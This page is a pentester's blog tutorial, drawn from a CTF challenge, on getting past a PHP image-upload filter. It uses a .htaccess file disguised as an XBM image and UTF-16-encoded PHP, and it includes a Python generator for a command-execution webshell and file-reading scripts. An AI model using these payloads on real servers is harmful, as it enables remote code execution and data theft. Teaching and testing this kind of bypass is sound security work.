<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-us">
<head>
  <title>
    Bypass file upload filter with .htaccess // Personnal security blog
  </title>

  <link href="http://gmpg.org/xfn/11" rel="profile">
<meta http-equiv="content-type" content="text/html; charset=utf-8">


<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">

<meta name="description" content="">
<meta name="keywords" content="">
<meta name="author" content="">
<meta name="generator" content="Hugo 0.53" />

  <meta property="og:title" content="Bypass file upload filter with .htaccess" />
<meta property="og:description" content="" />
<meta property="og:type" content="website" />
<meta property="og:locale" content="en_US" />
<meta property="og:url" content="https://thibaudrobin.github.io/articles/bypass-filter-upload/" />


  
  <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/pure/0.5.0/base-min.css">
  <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/pure/0.5.0/pure-min.css">
  
  
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/pure/0.5.0/grids-responsive-min.css">
  
  

  <link rel="stylesheet" href="https://thibaudrobin.github.io//css/redlounge.css">
  <link href="//use.fontawesome.com/releases/v5.6.3/css/all.css" rel="stylesheet">
  <link href='//fonts.googleapis.com/css?family=Raleway:400,200,100,700,300,500,600,800' rel='stylesheet' type='text/css'>
  <link href='//fonts.googleapis.com/css?family=Libre+Baskerville:400,700,400italic' rel='stylesheet' type='text/css'>

  
  <link rel="apple-touch-icon-precomposed" sizes="144x144" href="/touch-icon-144-precomposed.png">
  <link rel="shortcut icon" type="image/x-icon" href="/img/favicon.png">

  
  <link href="" rel="alternate" type="application/rss+xml" title="Personnal security blog" />

    
  
  <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/8.7/styles/tomorrow-night-bright.min.css">
  
  <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/8.7/highlight.min.js"></script>
  <script>hljs.initHighlightingOnLoad();</script>


  <script src="//code.jquery.com/jquery-3.3.1.min.js"></script>
  <link rel="stylesheet" type="text/css" href="https://thibaudrobin.github.io//css/lightbox.css">
  <script src="https://thibaudrobin.github.io//js/lightbox.min.js"></script>
  <script src="https://thibaudrobin.github.io//js/termynal.js"></script>
  <script src="https://thibaudrobin.github.io//js/emojify.min.js"></script>
  
  <link rel="stylesheet" type="text/css" href="https://thibaudrobin.github.io//css/termynal.css">
  <link rel="stylesheet" type="text/css" href="https://thibaudrobin.github.io//css/hover.css">
  <link rel="stylesheet" type="text/css" href="https://thibaudrobin.github.io//css/emojify.min.css">


<script async src="https://www.googletagmanager.com/gtag/js?id=UA-133286401-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-133286401-1');
</script>

  

  

  
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', "UA-133286401-1", 'auto');
  ga('send', 'pageview');
</script>

</head>

<body>
	

	<div id="layout" class="pure-g">
    <div class="sidebar pure-u-1 pure-u-md-1-4">
  <div class="header">
    

	
	  <img src="/img/moi.jpg" class="sidebarphoto">
	

    <h1 class="brand-title">Thibaud Robin</h1>
    <h2 class="brand-tagline">Alias Th1b4ud</h2>
    <h2 class="brand-tagline">PENTESTER</h2>
    <p>Personnal blog to speak about cybersecurity, technology and much more !</p>

    <nav class="nav">
      <ul class="nav-list">
        <li class="nav-item"><span class="nav-item-separator">//</span><a href="https://thibaudrobin.github.io/">Home</a></li>
        
          <li class="nav-item"><span class="nav-item-separator">//</span><a href="/whoami">WHOAMI</a></li>
        
          <li class="nav-item"><span class="nav-item-separator">//</span><a href="/writeups">WRITEUPS</a></li>
        
          <li class="nav-item"><span class="nav-item-separator">//</span><a href="/articles">ARTICLES</a></li>
        
      </ul>
    </nav>

    
    <div class="social-buttons">
      
        
        <a href="https://github.com/thibaudrobin" target="_blank"><i class='fab fa-github'></i></a>
        
      
        
        <a href="https://gitlab.com/thibaud.robin" target="_blank"><i class='fab fa-gitlab'></i></a>
        
      
        
        <a href="https://www.linkedin.com/in/thibaud-robin/" target="_blank"><i class='fab fa-linkedin'></i></a>
        
      
        
        <a href="https://www.root-me.org/Th1b4ud/" target="_blank"><i class='root-me'></i></a>
        
      
        
        <a href="https://twitter.com/th1b4ud" target="_blank"><i class='fab fa-twitter'></i></a>
        
      
      
    </div>
    

  </div>
</div>

	
	

    <div class="content pure-u-1 pure-u-md-3-4">
		<a name="top"></a>
		

		
			
		    <div id="toc" class="pure-u-1 pure-u-md-1-4">
				<small class="toc-label">Contents</small>
		   	 	<nav id="TableOfContents">
<ul>
<li>
<ul>
<li><a href="#show-me-your-protection">Show me your protection</a></li>
<li><a href="#choose-the-good-file">Choose the good file</a></li>
<li><a href="#welcome-to-polyglot-file">Welcome to polyglot file</a></li>
<li><a href="#bypass-the-anti-php-protection">Bypass the anti-PHP protection</a></li>
<li><a href="#conclusion">Conclusion</a></li>
</ul></li>
</ul>
</nav>
		    </div>
		    
	    
  		<section class="post">
            <h1 class="post-title">
              <a href="/articles/bypass-filter-upload/">Bypass file upload filter with .htaccess</a>
						</h1>
						
            <h3 class="post-subtitle">
							<sup class="quote"><i class="fas fa-quote-left"></i></sup>
							What a weak protection !
						</h3>
						
            
            	<span class="post-date">
                	<span class="post-date-day"><sup>20</sup></span><span class="post-date-separator">/</span><span class="post-date-month">Jan</span> <span class="post-date-year">2019</span>
            	</span>
            	
            
            	
            

			
			
				<div class="post-categories">
				
					<a class="post-category post-category-articles" href="https://thibaudrobin.github.io//categories/articles">Articles</a>
				
					<a class="post-category post-category-php" href="https://thibaudrobin.github.io//categories/php">PHP</a>
				
					<a class="post-category post-category-web" href="https://thibaudrobin.github.io//categories/web">Web</a>
				
				</div>
			

			

			

            

<p>I think you know what I am talking about. The &ldquo;file upload&rdquo; vulnerability is familiar for you ? Nice. So you know how it could be difficult to bypass protection to upload a webshell. I will show you a little technique to add to your test when you are trying to exploit file upload :)</p>

<p>This technique is inspired from the challenge <strong>l33t-hoster</strong> of the <a href="https://ctftime.org/event/686">Insomni&rsquo;hack Teaser 2019 CTF</a></p>

<p>So follow the guide !</p>

<h2 id="show-me-your-protection">Show me your protection</h2>

<p>First step is to understand (at least try) the protection. For this explanation, we will work on a nice PHP example.</p>

<pre><code class="language-php"> &lt;?php
if (isset($_GET[&quot;source&quot;])) 
    die(highlight_file(__FILE__));

session_start();

if (!isset($_SESSION[&quot;home&quot;])) {
    $_SESSION[&quot;home&quot;] = bin2hex(random_bytes(20));
}
$userdir = &quot;images/{$_SESSION[&quot;home&quot;]}/&quot;;
if (!file_exists($userdir)) {
    mkdir($userdir);
}

$disallowed_ext = array(
    &quot;php&quot;,
    &quot;php3&quot;,
    &quot;php4&quot;,
    &quot;php5&quot;,
    &quot;php7&quot;,
    &quot;pht&quot;,
    &quot;phtm&quot;,
    &quot;phtml&quot;,
    &quot;phar&quot;,
    &quot;phps&quot;,
);

if (isset($_POST[&quot;upload&quot;])) {
    if ($_FILES['image']['error'] !== UPLOAD_ERR_OK) {
        die(&quot;yuuuge fail&quot;);
    }

    $tmp_name = $_FILES[&quot;image&quot;][&quot;tmp_name&quot;];
    $name = $_FILES[&quot;image&quot;][&quot;name&quot;];
    $parts = explode(&quot;.&quot;, $name);
    $ext = array_pop($parts);

    if (empty($parts[0])) {
        array_shift($parts);
    }

    if (count($parts) === 0) {
        die(&quot;lol filename is empty&quot;);
    }

    if (in_array($ext, $disallowed_ext, TRUE)) {
        die(&quot;lol nice try, but im not stupid dude...&quot;);
    }

    $image = file_get_contents($tmp_name);
    if (mb_strpos($image, &quot;&lt;?&quot;) !== FALSE) {
        die(&quot;why would you need php in a pic.....&quot;);
    }

    if (!exif_imagetype($tmp_name)) {
        die(&quot;not an image.&quot;);
    }

    $image_size = getimagesize($tmp_name);
    if ($image_size[0] !== 1337 || $image_size[1] !== 1337) {
        die(&quot;lol noob, your pic is not l33t enough&quot;);
    }

    $name = implode(&quot;.&quot;, $parts);
    move_uploaded_file($tmp_name, $userdir . $name . &quot;.&quot; . $ext);
}

echo &quot;&lt;h3&gt;Your &lt;a href=$userdir&gt;files&lt;/a&gt;:&lt;/h3&gt;&lt;ul&gt;&quot;;
foreach(glob($userdir . &quot;*&quot;) as $file) {
    echo &quot;&lt;li&gt;&lt;a href='$file'&gt;$file&lt;/a&gt;&lt;/li&gt;&quot;;
}
echo &quot;&lt;/ul&gt;&quot;;
?&gt;

&lt;h1&gt;Upload your pics!&lt;/h1&gt;
&lt;form method=&quot;POST&quot; action=&quot;?&quot; enctype=&quot;multipart/form-data&quot;&gt;
    &lt;input type=&quot;file&quot; name=&quot;image&quot;&gt;
    &lt;input type=&quot;submit&quot; name=upload&gt;
&lt;/form&gt;
</code></pre>

<p>And it look like this</p>

<p><img src="/img/articles/bypass-filter-upload-1.png" alt="" /></p>

<p>To sum up. Filters do :</p>

<ul>
<li><strong>Check the file extension</strong>. If the file finish by <code>.php</code> or something like this, it will be refused.</li>
<li><strong>Check the filename</strong>. If the filename can&rsquo;t be splited in twice with <code>.</code> separator, it will be refused.</li>
<li><strong>Check the content</strong>. If the string <code>&lt;?</code> are present in the content, the file will be refused.</li>
<li><strong>Check the header</strong>. If the file is not an image, refused it.</li>
<li><strong>Check the size</strong>. If the file&rsquo;s height and width are not equal to 1337, refused it.</li>
</ul>

<p>Wow ! That&rsquo;s a secured upload form. But you can easily bypass it ;)</p>

<h2 id="choose-the-good-file">Choose the good file</h2>

<p>So, if we recap, we can&rsquo;t upload file with php extension. So the current goal is to have the possibility to execute php code in other file than <code>.php</code>. You can do the trick with <code>.htaccess</code>.</p>

<p>But what is <code>.htaccess</code> file ?</p>

<p><em>&rdquo;.htaccess is a configuration file for use on web servers running the Apache Web Server software. When a .htaccess file is placed in a directory which is in turn &lsquo;loaded via the Apache Web Server&rsquo;, then the .htaccess file is detected and executed by the Apache Web Server software.&rdquo;</em></p>

<p>Pretty clear. Thanks google ! So it&rsquo;s a configuration file. Now look at this conf :</p>

<pre><code class="language-bash">AddType application/x-httpd-php .php16      # Say all file with extension .php16 will execute php

php_value zend.multibyte 1                  # Active specific encoding (you will see why after :D)
php_value zend.detect_unicode 1             # Detect if the file have unicode content
php_value display_errors 1                  # Display php errors
</code></pre>

<p>So if you can upload this <code>.htaccess</code> file we will be the king and we will can execute our php code.</p>

<p>So try to upload it and we obtain :</p>

<pre><code class="language-text">lol filename is empty
</code></pre>

<p>Damned ! But if we analyse the code, we see it split the string in twice with <code>.</code> and check if there is two parts on the obtained array. So if we send a filename like <code>..htaccess</code>, the code will split in two parts : <code>.</code> and <code>.htaccess</code>. Test it !</p>

<pre><code class="language-text">not an image.
</code></pre>

<p>S**t ! Yeah our file is not an image, it&rsquo;s a htaccess file.</p>

<h2 id="welcome-to-polyglot-file">Welcome to polyglot file</h2>

<p>What is polyglot file ?</p>

<p><em>&ldquo;In computing, a polyglot is a computer program or script written in a valid form of multiple programming languages, which performs the same operations or output independent of the programming language used to compile or interpret it.&rdquo;</em></p>

<p>The first trick here is to find a way to bypass image checker. How would it be possible to send our <code>.htaccess</code> to pass through <code>exif_imagetype()</code> protection. The first think is to read the php doc to understand the function : <a href="http://php.net/manual/en/function.exif-imagetype.php">http://php.net/manual/en/function.exif-imagetype.php</a></p>

<p>Go to the bottom on the page and you will see all file authorized by the function. The goal is to found a format pretty clear to avoid garbage in our <code>.htaccess</code>. I think a XBM (X Bit Map) file will do the trick.</p>

<p><img src="/img/articles/bypass-filter-upload-2.png" alt="" /></p>

<p>Ok but what is a xbm file ? Look at wikipedia my dear : <a href="https://en.wikipedia.org/wiki/X_BitMap">https://en.wikipedia.org/wiki/X_BitMap</a></p>

<p><em>&ldquo;In computer graphics, the X Window System used X BitMap (XBM), a plain text binary image format, for storing cursor and icon bitmaps used in the X GUI.&rdquo;</em></p>

<p>And there is an example :</p>

<pre><code class="language-bash">#define test_width 16
#define test_height 7
static char test_bits[] = {
0x13, 0x00, 0x15, 0x00, 0x93, 0xcd, 0x55, 0xa5, 0x93, 0xc5, 0x00, 0x80,
0x00, 0x60 };
</code></pre>

<p><strong>OH ! Look at this !</strong></p>

<p><img src="https://media.giphy.com/media/WuGSL4LFUMQU/giphy.gif" alt="" /></p>

<p>The format of xbitmap is pretty clear : you set the image size on the first line of the file. And we&rsquo;ve got a <code>#</code> in front of the line ! So our <code>.htaccess</code> will not be disturbed by the xbitmap header. And with this trick <strong>we bypass size and image filter</strong>. Let&rsquo;s try this.</p>

<p>There is our new <code>..htaccess</code> file</p>

<pre><code class="language-bash">#define width 1337                          # Define the width wanted by the code (and say we are a legit xbitmap file lol)
#define height 1337                         # Define the height

AddType application/x-httpd-php .php16      # Say all file with extension .php16 will execute php

php_value zend.multibyte 1                  # Active specific encoding (you will see why after :D)
php_value zend.detect_unicode 1             # Detect if the file have unicode content
php_value display_errors 1                  # Display php errors
</code></pre>

<p>So upload it ! And oh magic the code accepted our file ! :D
We don&rsquo;t see our <code>.htaccess</code> because apache default configuration hide all file starting with a <code>.</code></p>

<p><img src="/img/articles/bypass-filter-upload-3.png" alt="" /></p>

<h2 id="bypass-the-anti-php-protection">Bypass the anti-PHP protection</h2>

<p>Nice ! I uploaded my <code>.htaccess</code> to run the php contain in my <code>.php16</code> files. But how can I upload php to bypass the filter on the code. The answer is simple : encode your payload.</p>

<p>Explanation. PHP support several form of encoding. Currently, you are writing in utf-8, but php also support utf-16 encoding. There is the same payload but encoded in utf-8 and after in utf-16</p>

<p>In utf-8, a character is encoded on 1 byte.</p>

<pre><code>00000000: 3c3f 7068 7020 7379 7374 656d 2824 5f47  &lt;?php system($_G
00000010: 4554 5b27 636d 6427 5d29 3b20 6469 6528  ET['cmd']); die(
00000020: 293b 203f 3e0a                           ); ?&gt;.
</code></pre>

<p>But in utf-16, the character is encoded on 2 bytes.</p>

<pre><code>00000000: 003c 003f 0070 0068 0070 0020 0073 0079  .&lt;.?.p.h.p. .s.y
00000010: 0073 0074 0065 006d 0028 0024 005f 0047  .s.t.e.m.(.$._.G
00000020: 0045 0054 005b 0027 0063 006d 0064 0027  .E.T.[.'.c.m.d.'
00000030: 005d 0029 003b 0020 0064 0069 0065 0028  .].).;. .d.i.e.(
00000040: 0029 003b 0020 003f 003e 0a              .).;. .?.&gt;.
</code></pre>

<p>I choose here utf-16 Big Endian encoding (to avoid some php bug). So we will have padding before our char : <code>003c</code> for the char <code>&lt;</code> in utf-16 instead of <code>3c</code> in utf-8. With this trick, the filter will not be triggered !</p>

<p>Here is a little python script to automate payload creation. You have to put the xbitmap signature to bypass the others filters.</p>

<pre><code class="language-python">## Description : create and bypass file upload filter with .htaccess
## Author : Thibaud Robin

# Will prove the file is a legit xbitmap file and the size is 1337x1337
SIZE_HEADER = b&quot;\n\n#define width 1337\n#define height 1337\n\n&quot;

def generate_php_file(filename, script):
	phpfile = open(filename, 'wb') 

	phpfile.write(script.encode('utf-16be'))
	phpfile.write(SIZE_HEADER)

	phpfile.close()

def generate_htacess():
	htaccess = open('..htaccess', 'wb')

	htaccess.write(SIZE_HEADER)
	htaccess.write(b'AddType application/x-httpd-php .php16\n')
	htaccess.write(b'php_value zend.multibyte 1\n')
	htaccess.write(b'php_value zend.detect_unicode 1\n')
	htaccess.write(b'php_value display_errors 1\n')

	htaccess.close()
		
generate_htacess()

generate_php_file(&quot;webshell.php16&quot;, &quot;&lt;?php system($_GET['cmd']); die(); ?&gt;&quot;)
generate_php_file(&quot;scandir.php16&quot;, &quot;&lt;?php echo implode('\n', scandir($_GET['dir'])); die(); ?&gt;&quot;)
generate_php_file(&quot;getfile.php16&quot;, &quot;&lt;?php echo file_get_contents($_GET['file']); die(); ?&gt;&quot;)
generate_php_file(&quot;info.php16&quot;, &quot;&lt;?php phpinfo(); die(); ?&gt;&quot;)
</code></pre>

<p>Upload them&hellip;</p>

<p><img src="/img/articles/bypass-filter-upload-4.png" alt="" /></p>

<p>And enjoy your webshell :)</p>

<p><img src="/img/articles/bypass-filter-upload-5.png" alt="" /></p>

<h2 id="conclusion">Conclusion</h2>

<p>It&rsquo;s really complicated to do a good and secure feature of file upload. There will be always a technique to bypass the security. The best way to secure your platform is to use framework which are already secured (a little&hellip;) and to install a WAF (Web Application Firewall) like ModSecurity in Apache in front of your application.</p>

<p>And always never trust user input !!!</p>

<p>See you soon :)</p>

<p>Th1b4ud</p>

	
			

			

			
          </section>
          
          	
          
        
      <div class="footer">
	<hr class="thin" />
	<div class="pure-menu pure-menu-horizontal pure-menu-open">
		<ul class="footer-menu">
		
		</ul>
	</div>

	<p>&copy; 2019. All rights reserved.</p>
</div>
    </div>
  </div>
	

	

  
</body>
</html>
